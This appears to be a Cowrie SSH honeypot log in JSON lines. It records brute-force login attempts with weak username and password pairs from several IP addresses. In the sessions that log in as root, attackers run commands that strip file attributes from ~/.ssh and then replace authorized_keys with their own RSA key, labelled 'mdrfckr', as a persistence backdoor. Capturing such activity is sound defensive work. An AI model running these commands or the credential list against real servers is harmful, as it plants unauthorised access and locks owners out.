{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:55:47.981194Z","src_ip":"212.227.125.160","session":"a2baec2053cd"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":52456,"dst_ip":"1.2.3.4","dst_port":22,"session":"cabfaac721e8","protocol":"ssh","message":"New connection: 93.113.63.124:52456 (1.2.3.4:22) [session: cabfaac721e8]","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.082232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.083302Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.153096Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.login.success","username":"root","password":"000000","message":"login attempt [root/000000] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.519255Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:56:05.719603Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.720386Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.721641Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.835944Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:56:05.998314Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:56:05.999382Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:56:06.199070Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:06.200114Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":52460,"dst_ip":"1.2.3.4","dst_port":22,"session":"2221a5e26b8e","protocol":"ssh","message":"New connection: 93.113.63.124:52460 (1.2.3.4:22) [session: 2221a5e26b8e]","sensor":"my-vps","timestamp":"2025-09-08T23:56:06.270348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:56:06.271638Z","src_ip":"93.113.63.124","session":"2221a5e26b8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:56:06.387505Z","src_ip":"93.113.63.124","session":"2221a5e26b8e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:56:06.741055Z","src_ip":"93.113.63.124","session":"2221a5e26b8e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:07.814199Z","src_ip":"93.113.63.124","session":"2221a5e26b8e"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":52476,"dst_ip":"1.2.3.4","dst_port":22,"session":"eda85c8bd7a3","protocol":"ssh","message":"New connection: 93.113.63.124:52476 (1.2.3.4:22) [session: eda85c8bd7a3]","sensor":"my-vps","timestamp":"2025-09-08T23:56:07.941817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:56:07.967530Z","src_ip":"93.113.63.124","session":"eda85c8bd7a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:56:08.037285Z","src_ip":"93.113.63.124","session":"eda85c8bd7a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:56:08.398794Z","src_ip":"93.113.63.124","session":"eda85c8bd7a3"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:08.470066Z","src_ip":"93.113.63.124","session":"cabfaac721e8"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:08.470984Z","src_ip":"93.113.63.124","session":"eda85c8bd7a3"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":34926,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff557e499be","protocol":"ssh","message":"New connection: 182.18.161.165:34926 (1.2.3.4:22) [session: 2ff557e499be]","sensor":"my-vps","timestamp":"2025-09-08T23:56:21.924068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:56:21.924701Z","src_ip":"182.18.161.165","session":"2ff557e499be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:56:22.176798Z","src_ip":"182.18.161.165","session":"2ff557e499be"}
{"eventid":"cowrie.login.failed","username":"hbase","password":"hbase1234","message":"login attempt [hbase/hbase1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:56:23.225652Z","src_ip":"182.18.161.165","session":"2ff557e499be"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:24.481292Z","src_ip":"182.18.161.165","session":"2ff557e499be"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":33052,"dst_ip":"1.2.3.4","dst_port":22,"session":"4097896364cd","protocol":"ssh","message":"New connection: 45.150.34.92:33052 (1.2.3.4:22) [session: 4097896364cd]","sensor":"my-vps","timestamp":"2025-09-08T23:56:34.173797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:56:34.175101Z","src_ip":"45.150.34.92","session":"4097896364cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:56:34.193168Z","src_ip":"45.150.34.92","session":"4097896364cd"}
{"eventid":"cowrie.login.failed","username":"client","password":"Password123","message":"login attempt [client/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:56:34.307791Z","src_ip":"45.150.34.92","session":"4097896364cd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:35.328510Z","src_ip":"45.150.34.92","session":"4097896364cd"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":37792,"dst_ip":"1.2.3.4","dst_port":22,"session":"50635039530b","protocol":"ssh","message":"New connection: 46.101.8.63:37792 (1.2.3.4:22) [session: 50635039530b]","sensor":"my-vps","timestamp":"2025-09-08T23:56:42.585693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:56:42.586880Z","src_ip":"46.101.8.63","session":"50635039530b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:56:42.611056Z","src_ip":"46.101.8.63","session":"50635039530b"}
{"eventid":"cowrie.login.failed","username":"butter","password":"butter@123","message":"login attempt [butter/butter@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:56:42.748089Z","src_ip":"46.101.8.63","session":"50635039530b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:56:43.774093Z","src_ip":"46.101.8.63","session":"50635039530b"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37948,"dst_ip":"1.2.3.4","dst_port":22,"session":"0631c9e0f859","protocol":"ssh","message":"New connection: 93.113.63.124:37948 (1.2.3.4:22) [session: 0631c9e0f859]","sensor":"my-vps","timestamp":"2025-09-08T23:57:09.117151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:09.147612Z","src_ip":"93.113.63.124","session":"0631c9e0f859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:09.206234Z","src_ip":"93.113.63.124","session":"0631c9e0f859"}
{"eventid":"cowrie.login.failed","username":"hbase","password":"hbase1234","message":"login attempt [hbase/hbase1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:57:09.485281Z","src_ip":"93.113.63.124","session":"0631c9e0f859"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:10.547917Z","src_ip":"93.113.63.124","session":"0631c9e0f859"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":33144,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e822a4002fd","protocol":"ssh","message":"New connection: 182.18.161.165:33144 (1.2.3.4:22) [session: 4e822a4002fd]","sensor":"my-vps","timestamp":"2025-09-08T23:57:33.989333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:33.990101Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:34.242943Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.login.success","username":"root","password":"password!","message":"login attempt [root/password!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:57:35.296811Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:57:35.819111Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:57:35.819816Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:57:35.820868Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:36.074503Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:57:36.693716Z","src_ip":"182.18.161.165","session":"4e822a4002fd"}
